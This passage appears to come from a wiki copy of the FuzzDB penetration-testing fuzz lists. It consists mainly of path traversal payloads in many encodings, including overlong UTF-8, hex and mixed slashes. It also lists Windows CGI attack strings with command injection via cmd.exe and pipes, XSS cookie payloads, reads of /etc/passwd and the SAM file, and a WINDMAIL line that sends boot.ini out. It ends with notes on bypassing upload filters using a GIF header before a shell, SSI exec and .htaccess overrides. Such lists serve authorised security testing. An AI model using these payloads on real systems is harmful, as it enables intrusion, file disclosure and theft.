0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
